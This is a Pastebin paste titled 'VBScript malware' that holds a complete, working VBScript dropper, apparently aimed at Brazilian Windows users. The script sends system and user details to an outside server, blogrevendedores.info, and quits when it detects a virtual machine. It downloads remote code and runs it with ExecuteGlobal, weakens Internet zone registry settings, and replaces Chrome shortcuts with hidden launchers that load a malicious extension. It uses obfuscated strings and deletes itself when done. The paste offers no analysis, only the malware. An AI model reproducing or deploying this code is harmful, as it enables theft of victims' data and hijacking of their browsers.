Advertisement
Guest User

VBScript malware

a guest
Oct 22nd, 2018
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 16.52 KB | None | 0 0
  1. "On Error Resume Next
  2. variavel2numerox = "113"
  3. set variavel1 = wScript.createObject("WScript.Shell")
  4. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  5. DIM fso
  6. Set fso = CreateObject("Scripting.FileSystemObject")
  7. If (fso.FileExists(variavel2 & "\" & variavel2numerox & "x")) Then
  8. discardScript()
  9. WScript.Quit()
  10. Else
  11. Set objFSO=CreateObject("Scripting.FileSystemObject")
  12. outFile=variavel2 & "\" & variavel2numerox & "x"
  13. Set objFile = objFSO.CreateTextFile(outFile,True)
  14. objFile.Write "closed" & vbCrLf
  15. objFile.Close
  16. xbits = "0"
  17. Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
  18. Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem")
  19. for each System in SystemSet
  20. variavel2a = System.Caption
  21. variavel2b = System.OSLanguage
  22. variavel2d = System.CSName
  23. dtmConvertedDate.Value = System.InstallDate
  24. dtmInstallDate = dtmConvertedDate.GetVarDate
  25. variavel2e = dtmInstallDate
  26. variavel2f = System.RegisteredUser
  27. variavel2g = System.CountryCode
  28. variavel2h = System.version
  29. next
  30. strComputer = "."
  31. strComputer2 = "\"
  32. strComputer3 = ":"
  33. strfinal = "winmgmts"& strComputer3 & strComputer2 & strComputer2 & strComputer & strComputer2 &"root" & strComputer2 & "cimv2"
  34. Set objWMIService =  GetObject(strfinal)
  35. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  36. For Each objComputer in colSettings
  37. variavel2i2 = objComputer.Manufacturer
  38. variavel2j2 = objComputer.Model
  39. Next
  40. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_Processor")
  41. For Each objProcessor in colSettings
  42. variavel2l2 = objProcessor.Description
  43. Next
  44. Function HTTPPost(sUrl, sRequest)
  45. set oHTTP = CreateObject("Microsoft.XMLHTTP")
  46. oHTTP.open "POST", sUrl,false
  47. oHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  48. oHTTP.setRequestHeader "Content-Length", Len(sRequest)
  49. oHTTP.send sRequest
  50. HTTPPost = oHTTP.responseText
  51. End Function
  52. set variavel32x = wScript.createObject("WScript.Shell")
  53. variavel32 = variavel32x.expandEnvironmentStrings("%programfiles%")
  54. set variavel64x = wScript.createObject("WScript.Shell")
  55. variavel64 = variavel32x.expandEnvironmentStrings("%programfiles(x86)%")
  56. DIM fsoyx2
  57. Set fsoyx2 = CreateObject("Scripting.FileSystemObject")
  58. If (fsoyx2.FileExists(variavel32 & "\Google\Chrome\Application\chrome.exe")) Then
  59. xbits =  variavel32 & "\Google\Chrome\Application\Chrome.exe, 0"
  60. End If
  61. If (fsoyx2.FileExists(variavel64 & "\Google\Chrome\Application\chrome.exe")) Then
  62. xbits =  variavel64 & "\Google\Chrome\Application\Chrome.exe, 0"
  63. End If
  64. DIM fsoy
  65. Set fsoy = CreateObject("Scripting.FileSystemObject")
  66. If (fsoy.FolderExists("c:\Program Files (x86)")) Then
  67. quantosbits = "64Bits"
  68. Else
  69. quantosbits = "32Bits"
  70. End If
  71. vartotal = variavel2i2 & "|" & variavel2j2 & "|" & variavel2l2
  72. IF (variavel2g = "55") Then
  73. sUrl = "http://blogrevendedores.info/xlog5.php?logins=0a"
  74. sRequest = "host=" & variavel2d & "&status=[" & variavel2numerox & "]" & variavel2a & "(" & quantosbits & ")(" & variavel2b & ")(" & variavel2e & ")(" & variavel2f & ")(" & variavel2g & ")(" & variavel2h & ")" & vartotal  & "&globo=H74frxs&bk=-"
  75. HTTPPost sUrl, sRequest
  76. End If
  77. IF (variavel2g = "55") and not   (xbits = "0")  Then
  78. set objshell = createobject("wscript.shell")
  79. runbat2 = variavel2 & "\b.bat"
  80. Set objgrux=CreateObject("Scripting.FileSystemObject")
  81. outFile= runbat2
  82. Set objFile = objgrux.CreateTextFile(outFile,True)
  83. objFile.Write "@echo off" & vbCrLf
  84. objFile.Write "del /f /s /q ""%userprofile%\chrome""" & vbCrLf
  85. objFile.Write "rd /s /q ""%userprofile%\chrome""" & vbCrLf
  86. objFile.Write "rmdir /s /q ""%userprofile%\chrome""" & vbCrLf
  87. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK""" & vbCrLf
  88. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK""" & vbCrLf
  89. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome2.LNK""" & vbCrLf
  90. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome.LNK""" & vbCrLf
  91. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome\Google Chrome.LNK""" & vbCrLf
  92. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK""" & vbCrLf
  93. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome.LNK""" & vbCrLf
  94. objFile.Write "del /f ""C:\Users\Public\Desktop\Google Chrome.LNK""" & vbCrLf
  95. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome2.LNK""" & vbCrLf
  96. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK""" & vbCrLf
  97. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK""" & vbCrLf
  98. objFile.Write "del /f ""%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs""" & vbCrLf
  99. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  100. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  101. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  102. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  103. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  104. objFile.Write "del /f """ & runbat2 & """" & vbCrLf
  105. objFile.Close
  106. objshell.run "cmd.exe /C """ & runbat2 & """",vbhide
  107. WScript.Sleep(20000)
  108. set variavel1 = wScript.createObject("WScript.Shell")
  109. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  110. sUrl = "http://blogrevendedores.info/xlog5.php?logins=did&s=Ch"
  111. sRequest = "host=" & variavel2d & "&bk=-"
  112. HTTPPost sUrl, sRequest
  113. Dim su, source_str
  114. source_str = "aeiou"
  115. Dim variavel3, variavel16, variavel4, variavel5, variavel4b
  116. variavel3 = variavel2
  117. variavel6 =  ""
  118. variavel6b =  StrReverse("-")
  119. su = Mid(source_str, 2, 1)
  120. variavel5 = variavel6  & "." & su & "x" & su
  121. variavel4 = variavel3 & "\" & variavel5
  122. variavel4 = variavel3 & "\" & StrReverse("piz.tgu")
  123. variavel9 = variavel4
  124. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  125. dim variavel7,variavel8
  126. dim variavel7b,variavel8b,variavel9b
  127. su = Mid(source_str, 3, 1)
  128. strComputer = "."
  129. Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")
  130. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  131. For Each objComputer in colSettings
  132. xxx1 = objComputer.Manufacturer
  133. xxx2 = objComputer.Model
  134. Next
  135. Set colItems = objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration",,48)
  136. For Each objItem in colItems
  137. xxx3 = xxx3 & objItem.Caption
  138. xxx4 = "[" & variavel2numerox & "]" & objItem.Description
  139. Next
  140. sUrl1 = "http://blogrevendedores.info/xlogx.php"
  141. sRequest1 = "x=1l&info=" & xxx1 & " | " & xxx2 & "&an=" & xxx3 & xxx4
  142. xxx5 = HTTPPost(sUrl1, sRequest1)
  143. variavel8 = xxx5
  144. If InStr(variavel8, "bit") > 0 Then
  145. sUrl = "http://blogrevendedores.info/xlog5.php?logins=did&s=VM"
  146. sRequest = "host=" & variavel2d & "&bk=-"
  147. HTTPPost sUrl, sRequest
  148. WScript.Quit()
  149. End If
  150. Dim max,min
  151. max=10000
  152. min=1
  153. Randomize
  154. Int((max-min+1)*Rnd+min)
  155. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  156. If variavel16.FileExists(variavel9) Then
  157. variavel16.DeleteFile(variavel9)
  158. End If
  159. xsUrl = "http://pastebin.com/raw/kXaRaqSu"
  160. xsRequest = ""
  161. zzz = HTTPPost(xsUrl, xsRequest)
  162. xxx = zzz
  163. Sub Includex
  164. ExecuteGlobal xxx
  165. End Sub
  166. Includex
  167. MySub variavel8,variavel9
  168. Set variavel12 = CreateObject("Scripting.FileSystemObject")
  169. If variavel12.FileExists(variavel9) Then
  170. sUrl = "http://blogrevendedores.info/xlog5.php?logins=did&s=B"
  171. sRequest = "host=" & variavel2d & "&bk=-"
  172. HTTPPost sUrl, sRequest
  173. ZipFile = variavel9
  174. ExtractTo = variavel2
  175. Set fso = CreateObject("Scripting.FileSystemObject")
  176. If NOT fso.FolderExists(ExtractTo) Then
  177. fso.CreateFolder(ExtractTo)
  178. End If
  179. set objShell = CreateObject("Shell.Application")
  180. set FilesInZip=objShell.NameSpace(ZipFile).items
  181. objShell.NameSpace(ExtractTo).CopyHere(FilesInZip)
  182. Set fso = Nothing
  183. Set objShell = Nothing
  184. End if
  185. If variavel16.FileExists(variavel9) Then
  186. Dim variavel15
  187. If variavel16.FileExists(variavel2 & "\Chrome\1.9.6\6.js" ) Then
  188. sUrl = "http://blogrevendedores.info/xlog5.php?logins=did&s=OK"
  189. sRequest = "host=" & variavel2d  & "&bk=-"
  190. HTTPPost sUrl, sRequest
  191. End if
  192. set gtx1 = wScript.createObject("WScript.Shell")
  193. gtx2 = gtx1.expandEnvironmentStrings("%USERPROFILE%")
  194. Dim pixixito1,pixixito2,pixixito3,pixixito4
  195. Function RandomString( ByVal strLen )
  196. Dim str, min, max
  197. Const LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJLMNKYWOPQRSTUVXZ"
  198. min = 1
  199. max = Len(LETTERS)
  200. Randomize
  201. For i = 1 to strLen
  202. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  203. Next
  204. RandomString = str
  205. End Function
  206. Function Randominterger( ByVal strLen )
  207. Dim str, min, max
  208. Const LETTERS = "1234567890"
  209. min = 1
  210. max = Len(LETTERS)
  211. Randomize
  212. For i = 1 to strLen
  213. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  214. Next
  215. Randominterger = str
  216. End Function
  217. dim yttt
  218. yttt = Randominterger(15)
  219. Function trocaridc( ForReadingx)
  220. const ForReading = 1
  221. const ForWriting = 2
  222. strFileName = gtx2 & "\Chrome\1.9.6\" & ForReadingx & ".js"
  223. strOldText = "var id = ""-"";"
  224. strNewText = "var id = """ & yttt & """;"
  225. Set objgru = CreateObject("Scripting.FileSystemObject")
  226. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  227. strText = objFile.ReadAll
  228. objFile.Close
  229. strNewText = Replace(strText, strOldText, strNewText)
  230. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  231. objFile.WriteLine strNewText
  232. objFile.Close
  233. End Function
  234. Function trocar( ForReadingx)
  235. dim ttt
  236. const ForReading = 1
  237. const ForWriting = 2
  238. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  239. strOldText = ForReadingx
  240. ttt = RandomString(6)
  241. strNewText = ttt & ".js"
  242. Dim gru
  243. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  244. gru.MoveFile gtx2 & "\Chrome\1.9.6\" & strOldText, gtx2 & "\Chrome\1.9.6\" & strNewText
  245. Set objgru = CreateObject("Scripting.FileSystemObject")
  246. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  247. strText = objFile.ReadAll
  248. objFile.Close
  249. strNewText = Replace(strText, strOldText, strNewText)
  250. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  251. objFile.WriteLine strNewText
  252. objFile.Close
  253. End Function
  254. Function trocarbmp( ForReadingx)
  255. dim ttt
  256. const ForReading = 1
  257. const ForWriting = 2
  258. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  259. strOldText = ForReadingx
  260. ttt = RandomString(10)
  261. strNewText = ttt & ".bmp"
  262. Dim gru
  263. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  264. gru.MoveFile gtx2 & "\Chrome\1.9.6\iconos\" & strOldText, gtx2 & "\Chrome\1.9.6\iconos\" & strNewText
  265. Set objgru = CreateObject("Scripting.FileSystemObject")
  266. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  267. strText = objFile.ReadAll
  268. objFile.Close
  269. strNewText = Replace(strText, strOldText, strNewText)
  270. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  271. objFile.WriteLine strNewText
  272. objFile.Close
  273. End Function
  274. DIM grut
  275. Set grut = CreateObject("Scripting.FileSystemObject")
  276. If (grut.FileExists(gtx2 & "\Chrome\1.9.6\6.js")) Then
  277. trocaridc("1")
  278. trocaridc("2")
  279. trocaridc("3")
  280. trocar("1.js")
  281. trocar("2.js")
  282. trocar("3.js")
  283. trocarbmp("1.bmp")
  284. End If
  285. pixixito1 = RandomString(5)
  286. pixixito2 = RandomString(5)
  287. pixixito3 = RandomString(5)
  288. pixixito4 = RandomString(5)
  289. runvbs = gtx2 & "\" & RandomString(5) & ".vbs"
  290. runbat = gtx2 & "\" & RandomString(5) & ".bat"
  291. set gtx1a = wScript.createObject("WScript.Shell")
  292. gtappdata = gtx1a.expandEnvironmentStrings("%appdata%")
  293. set gtx1b = wScript.createObject("WScript.Shell")
  294. gtuserprofile = gtx1b.expandEnvironmentStrings("%userprofile%")
  295. Set oWS = WScript.CreateObject("WScript.Shell")
  296. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK"
  297. Set oLink = oWS.CreateShortcut(sLinkFile)
  298. oLink.TargetPath = """" & runvbs & """"
  299. oLink.IconLocation = xbits
  300. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\"
  301. oLink.Save
  302. Set oWS = WScript.CreateObject("WScript.Shell")
  303. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK"
  304. Set oLink = oWS.CreateShortcut(sLinkFile)
  305. oLink.TargetPath = """" & runvbs & """"
  306. oLink.IconLocation = xbits
  307. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\"
  308. oLink.Save
  309. Set oWS = WScript.CreateObject("WScript.Shell")
  310. sLinkFile = gtuserprofile & "\Desktop\Google Chrome.LNK"
  311. Set oLink = oWS.CreateShortcut(sLinkFile)
  312. oLink.TargetPath = """" & runvbs & """"
  313. oLink.IconLocation = xbits
  314. oLink.WorkingDirectory = gtuserprofile &  "\Desktop"
  315. oLink.Save
  316. Set oWS = WScript.CreateObject("WScript.Shell")
  317. sLinkFile = "C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK"
  318. Set oLink = oWS.CreateShortcut(sLinkFile)
  319. oLink.TargetPath = """" & runvbs & """"
  320. oLink.IconLocation = xbits
  321. oLink.WorkingDirectory = "C:\Documents and Settings\All Users\Menu Iniciar\Programas"
  322. oLink.Save
  323. Set oWS = WScript.CreateObject("WScript.Shell")
  324. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK"
  325. Set oLink = oWS.CreateShortcut(sLinkFile)
  326. oLink.TargetPath = """" & runvbs & """"
  327. oLink.IconLocation = xbits
  328. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
  329. oLink.Save
  330. Set oWS = WScript.CreateObject("WScript.Shell")
  331. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK"
  332. Set oLink = oWS.CreateShortcut(sLinkFile)
  333. oLink.TargetPath = """" & runvbs & """"
  334. oLink.IconLocation = xbits
  335. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\"
  336. oLink.Save
  337. Set objgrux=CreateObject("Scripting.FileSystemObject")
  338. outFile= runvbs
  339. Set objFile = objgrux.CreateTextFile(outFile,True)
  340. objFile.Write "set objshell = createobject(""wscript.shell"")" & vbCrLf
  341. objFile.Write "objshell.run ""cmd.exe /C """"" & runbat & """"""",vbhide" & vbCrLf
  342. objFile.Close
  343. Set objShell5 = WScript.CreateObject("WScript.Shell")
  344. Cami2 = objShell5.ExpandEnvironmentStrings("%userprofile%")
  345. bonde1kilo="Wind" & "ows\syste" & "m32"
  346. segundafeira="userpr" & "ofile"
  347. nossasvidas="prog" & "ramfi" & "les"
  348. Set objgru=CreateObject("Scripting.FileSystemObject")
  349. outFile= runbat
  350. Set objFile = objgru.CreateTextFile(outFile,True)
  351. objFile.Write "@echo off" & vbCrLf
  352. objFile.Write "set " & pixixito1 & "=G" & "oo" & vbCrLf
  353. objFile.Write "set " & pixixito2 & "=%" & pixixito1 & "%g" & "le" & vbCrLf
  354. objFile.Write "set " & pixixito3 & "=c" & "hr" & vbCrLf
  355. objFile.Write "set " & pixixito4 & "=%" & pixixito3 & "%om" & "e" & vbCrLf
  356. objFile.Write "cd ""%" & segundafeira & "%""" & vbCrLf
  357. objFile.Write "C:\" & bonde1kilo & "\rmdir /s /q ""%" & segundafeira & "%\ext""" & vbCrLf
  358. objFile.Write "C:\" & bonde1kilo & "\mkdir ext" & vbCrLf
  359. objFile.Write "set s=%random%" & vbCrLf
  360. objFile.Write "set fs=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  361. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im xcopy.exe" & vbCrLf
  362. objFile.Write "C:\" & bonde1kilo & "\xcopy /I /S ""%" & segundafeira & "%\%" & pixixito4 & "%\1.9.6"" %fs%" & vbCrLf
  363. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im %" & pixixito4 & "%.exe" & vbCrLf
  364. objFile.Write "IF EXIST ""%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.e" & "xe"" (" & vbCrLf
  365. objFile.Write """%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  366. objFile.Write "ECHO ""x86""" & vbCrLf
  367. objFile.Write ") ELSE (" & vbCrLf
  368. objFile.Write """%" & nossasvidas & "%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  369. objFile.Write "ECHO ""NORMAL""" & vbCrLf
  370. objFile.Write ")" & vbCrLf
  371. objFile.Close
  372. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  373. If variavel16.FileExists(variavel9) Then
  374. variavel16.DeleteFile(variavel9)
  375. End If
  376. Set objShell = Nothing
  377. Set objshell = createobject("wscript.shell")
  378. objshell.run "cscript """ & runvbs & """",vbhide
  379. End If
  380. Set variavel15 = Nothing
  381. End If
  382. End If
  383. Function discardScript()
  384. Set objFSO = CreateObject("Scripting.FileSystemObject")
  385. strScript = Wscript.ScriptFullName
  386. objFSO.DeleteFile(strScript)
  387. End Function
  388. discardScript()"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement